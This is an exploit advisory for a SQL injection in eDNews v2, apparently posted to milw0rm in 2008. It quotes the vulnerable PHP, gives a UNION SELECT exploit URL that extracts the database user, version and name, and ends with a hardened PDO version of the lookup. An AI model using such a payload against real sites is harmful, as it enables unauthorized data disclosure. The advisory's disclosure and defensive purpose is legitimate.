#######################################################################################
#                                                                                     #
#            ...:::::eDNews v2 SQL Injection Vulnerability::::....                    #
#######################################################################################
Virangar Security Team
www.virangar.net
--------
Discovered By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
vuln code in eDNews_view.php:
line 22-23:
if ( isset( $_REQUEST['newsid'] ) ) {
    ${$CONFIG['fld_id']} = $_REQUEST['newsid'];
....
line 42-46:
$arr_select = array( $CONFIG['fld_id'], ''.$CONFIG['fld_title'].'', ''.$CONFIG['fld_content'].'',''.$CONFIG['fld_dateCreated'].'',''.$CONFIG['fld_score'] .'');
$arr_from = array($CONFIG['table']);
$where = $CONFIG['fld_id'].' = '.${$CONFIG['fld_id']};
$eDQuery_ = new edQuery( $dblink, $CONFIG['db'], $arr_from, $arr_select, $where, null, 'extended', $CONFIG['debug'], null, '1' );
$arr_rst = $eDQuery_->getRecords();
---
exploit:
http://site.com/eDNews_view.php?newsid=-99/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3e,database()),4,5/*
-------
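A hardened form of the lookup shown in the excerpt, as an added example that is not eDNews code or the advisory author's: newsid is validated as a positive integer and bound as a parameter instead of being concatenated into $where. PDO with an in-memory SQLite database stands in for the project's edQuery class, and the $CONFIG values, table and sample row are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Constructed stand-ins for the eDNews configuration keys seen in the excerpt.
$CONFIG = [
    'table'       => 'ednews',
    'fld_id'      => 'id',
    'fld_title'   => 'title',
    'fld_content' => 'content',
];

// Identifiers cannot be bound as parameters, so accept only plain names.
function safe_ident(string $name): string
{
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $name)) {
        throw new InvalidArgumentException("bad identifier: $name");
    }
    return $name;
}

// Returns the matching row, or null when newsid is not a positive integer
// or no row exists. The request value never becomes part of the SQL text.
function fetch_news(PDO $db, array $cfg, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $cols = implode(', ', array_map('safe_ident',
        [$cfg['fld_id'], $cfg['fld_title'], $cfg['fld_content']]));
    $sql = sprintf('SELECT %s FROM %s WHERE %s = :id LIMIT 1',
        $cols, safe_ident($cfg['table']), safe_ident($cfg['fld_id']));
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ednews (id INTEGER PRIMARY KEY, title TEXT, content TEXT)');
$db->exec("INSERT INTO ednews VALUES (1, 'Hello', 'First post')");

var_dump(fetch_news($db, $CONFIG, '1'));        // well-formed id
var_dump(fetch_news($db, $CONFIG, '1 OR 1=1')); // non-integer input, rejected before a query is built
```

The integer check alone closes this particular hole; binding the value as well keeps the query safe if the column type or validation rule later changes.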
young iranian h4ck3rz

# milw0rm.com [2008-12-29]